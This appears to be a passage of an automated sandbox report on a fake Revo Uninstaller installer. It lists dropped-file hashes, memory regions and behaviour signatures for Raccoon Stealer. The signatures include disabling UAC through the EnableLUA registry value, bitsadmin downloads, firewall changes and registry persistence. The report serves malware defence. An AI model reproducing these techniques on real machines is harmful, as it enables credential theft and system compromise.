memory/3948-563-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3464-565-0x000000006F6E0000-0x000000006F72C000-memory.dmp

memory/3464-575-0x0000000007050000-0x00000000070F3000-memory.dmp

memory/3464-576-0x0000000007300000-0x0000000007311000-memory.dmp

C:\ProgramData\VS Revo Group\Revo Uninstaller Pro\revouninstallerpro4.lic

MD5 8462a9b69c76a9603a4143d51fbc201e
SHA1 4473590f93f94f22c340a354516191c3c0ba6532
SHA256 fe4bcb4251f77375119a936c80fb36221af0c5105e840e2e115d47f96cb437c8
SHA512 2f02ecdb06760a093f4d8e6f04c97138695b064db8cb2dcc4af9b47c829852f38b77be9425eb2f3e3e36f85da181c116c829921fa35ae68afc57c728d5393570

memory/3464-578-0x0000000007350000-0x0000000007364000-memory.dmp

memory/1184-580-0x0000000000400000-0x0000000000E32000-memory.dmp

memory/3996-581-0x0000000005970000-0x0000000005CC4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3bf3cf2a1f9dfa39053a2e52efd53d4c
SHA1 efe9fa8ceae3f0f9b8d2d5c6eed17b78ccfd6ed9
SHA256 5a9671e65d4f22e2b592c14b6b18c08a88579363fc34dd0a7af952fa515287c1
SHA512 9ed2515f428ac04f30098038dc73bb9f6eab5cb222408990652ccb4ba6c77fb05223dc6c01b200033279d043838562d05b4c6511975d878f57112c723107022e

C:\Users\Admin\AppData\Local\VS Revo Group\Revo Uninstaller Pro\data\cachedata.dat

MD5 d1d1e40ea4d3ed2a8d5def030a67e025
SHA1 0ec1c6fd519d9cd0d89b0b0d86b8b74c356fbe3c
SHA256 42d33b63bce3350ade857c571d281e013c2b2b28d42f7ddf509d57c596ef0088
SHA512 94c27ba0d16e653a25c8e1c488a1d35a020b4b932d4c8953a0ecce6ceba5c153718a4eb46cbfca3169a008c0387b16f6b02d8806d4711d9d6bb3ad015ee8bd32

memory/3996-596-0x0000000006580000-0x00000000065CC000-memory.dmp

memory/3996-598-0x00000000747B0000-0x00000000747FC000-memory.dmp

memory/3996-608-0x0000000007290000-0x0000000007333000-memory.dmp

memory/3996-609-0x0000000007540000-0x0000000007551000-memory.dmp

memory/3996-610-0x0000000007580000-0x0000000007594000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e981a9b06aab254a64a5c2b07ee4c188
SHA1 e87ef6195e019ea175c3be781597a2972abab9d2
SHA256 82ba303d4ad497e690525fd2bb40ceafea797dc73fdee4820df6860f711c392c
SHA512 d0aca64c2f61cb941103cd1fbf1d4732b9135f9657c601210bb413b9c7286b4d1a253bfbd277c066500a365111367ade6b830ae0d4e7e7721efa98e5b7c65ecb

memory/4692-622-0x00000000747B0000-0x00000000747FC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0dd66ce57443547d10c5f39ea090cf9d
SHA1 9c3c27cf8c3a8b4d6dc6666e746a0b65df4ed270
SHA256 b4fe650da01824398666a7dbe6bc862f1580369035a274b1ed6e0842d9d82054
SHA512 f552d53bb3e0d56da03a4965a7646a9b02ba9625411058cd67e20e62d9a4ef5ce9492f82e365e79de768e5ebedc5b565c34943efb03a10726ef5108ad69bc356

C:\ProgramData\uzlyLtM20yixSdV\main.bat

MD5 1376349b5831fe5760106870cd5bad6d
SHA1 cf6ff2d17e597893a61fedfd4fe90748ab2349e1
SHA256 67fc2976cfc997cc5d0e74a45ba3fe44c486e3f57e92a9b77cfd4d55199c1872
SHA512 64af4f7e513b6e860757293f0dd92100f17121f10d9c75c72c8ff9bea1144eda55c62be6b16a158b513828cdc3e3c5a355382062d975673617f020a5e10d99b8

C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat

MD5 308ba58a50ffa9eabd31fdba79af6dd1
SHA1 29c09164facb6419f9d7f9e103f7e13bed4743a1
SHA256 0ef02b5ebb5f59c70722fc29651ad48a49b2b4d87f33416b1b06c8a038475243
SHA512 674edfeacf8c6e606a80187f95dc16abcc0804f18c2b2e81734cf4f7e6d1f68e9db5827f18107c0882506aba47485665471c37acd2b9ad50ca075eb083a9582f

C:\ProgramData\uzlyLtM20yixSdV\file.bin

MD5 3ba604f3bc038fae6d7d70df18a95e8d
SHA1 f8553490c0063dba7d0e69b9e688d9abfec98314
SHA256 5077f9091c91a13eb822227b0a4e9a2f277542eec22910f794a44606fea16af5
SHA512 3144a0fb0ffc02e2cf35bffad36b42a76c6f7edd3089eeac884bb742278a68245143da981d54b9e0c026778bdf9ca38d19ea69c09e206e86defbd17427d1f642

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\ProgramData\uzlyLtM20yixSdV\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\ProgramData\uzlyLtM20yixSdV\extracted\file_2.zip

MD5 b935bb028c9e072364d33b5e482b93c9
SHA1 63a89514cfd0a64fc7a1fbcd5bd91f0c350a212b
SHA256 5d55c036145879b4e92a9bd1862ff15c83954469bf96ce7cc8afbd6229d21845
SHA512 a41c488f634d117dcee8aaf5de8bbf9463ae39be1b85aa12355cbec9f275085c44c3ed654e214fbbde8a51c260627c105b1902aebb66e0129f3c11d699de53bc

C:\ProgramData\uzlyLtM20yixSdV\extracted\file_1.zip

MD5 c28ab5e6ae8588e03b92c24b14d12fef
SHA1 801c88fb58288fa2d54cf7584a089d6c50c02bb8
SHA256 ec59673a06768a14aed715995de14d34af211af5a4534059b5e22ab314a447a2
SHA512 a3f51f254166caba5664d5aca331142d481a60c803de8d69d5d278b1c74bcf2b312b07fd1e46e380ff3954f4e104674081fe3ceaa782b178adfab9226fe83442

C:\ProgramData\uzlyLtM20yixSdV\extracted\111.exe

MD5 618155a1c0479bc80c4bd28b7af93162
SHA1 542bf77b03bbdc5cc5caf0582b39cdc185e686f6
SHA256 ea712e9759d73168f605f8a55771d4aef62b0bef4b45cb8fd68ed11ea11c2fb4
SHA512 b870452ce96985e431789c2497f4fa46194ce1bf56463e1dc99b98513236b8b01228ec08c734a6c6af739ee00cb715a6cd8a62382febab4678a1055c34d5a461

C:\ProgramData\uzlyLtM20yixSdV\extracted\ANTIAV~1.DAT

MD5 3b9f43ca28acf55c64c9aa1ceb46c2d7
SHA1 7e30f2fde7a55b2023b03231993d66ea48513083
SHA256 ef08bdd7b11c188b1c0d0138dc9030fd3a2923512f983623bbdd34e55d95e50f
SHA512 58dece7172478fc948020de1dd67939331f0db1191b2583fa421406ba8d5d5a1907e2989447813ca1f0fdc0b9248e8bdb31db241f78e2b3f12d64f5c49f7d0a2

memory/4612-670-0x00000000008A0000-0x00000000009CE000-memory.dmp

memory/4612-671-0x0000000005280000-0x0000000005312000-memory.dmp

memory/4612-672-0x00000000053C0000-0x000000000545C000-memory.dmp

memory/4612-673-0x0000000005360000-0x000000000536A000-memory.dmp

memory/4612-674-0x0000000005800000-0x000000000581A000-memory.dmp

memory/4612-675-0x0000000007060000-0x0000000007150000-memory.dmp

memory/4612-676-0x0000000009740000-0x00000000097D8000-memory.dmp

memory/2752-679-0x0000000000400000-0x0000000000495000-memory.dmp

memory/2752-681-0x0000000000400000-0x0000000000495000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-02 14:53

Reported

2024-10-02 14:55

Platform

win7-20240903-en

Max time kernel

145s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"

Signatures

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\DRIVERS\SET2839.tmp C:\Windows\system32\rundll32.exe N/A
File created C:\Windows\system32\DRIVERS\SET2839.tmp C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\revoflt.sys C:\Windows\system32\rundll32.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Control Panel\International\Geo\Nation C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\system32\rundll32.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2228 set thread context of 2988 N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe C:\ProgramData\uzlyLtM20yixSdV\111.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-R3G4K.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1CCP1.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P42QS.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-EPSJK.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P16HQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8J9A4.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-LM2NR.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-H28K7.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SABMQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-9JREG.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-O1JAE.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-A5JKK.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1FKA5.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DJPHA.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-4N1NQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
File created C:\Program Files (x86)\is-U6KOT.tmp C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-CRER1.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-ISCMV.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-55INN.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-9P2QL.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-931CM.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1RODL.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-JFCQE.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-3TS51.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-6UR6Q.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-Q8BBP.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-39OPA.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-3JF08.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-8495I.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-JTHFQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-28FML.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-9IIPE.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-RFR70.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-GSVS2.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-6EHPV.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SQB8P.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-PVVH9.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-59SL6.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-T4M4R.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-RJHJR.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-J94CH.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8LUA5.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-BI39F.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7RO2T.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-0F60D.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-4R7ND.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-CV8TO.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-M9TL8.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-78MGP.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-Q4T3N.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-S2T3L.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DT655.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-AD34U.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-L6J3P.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-11GRQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HA11U.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\DisplayIcon.ico C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
File opened for modification C:\Windows\INF\setupapi.app.log C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_Reader.exe C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
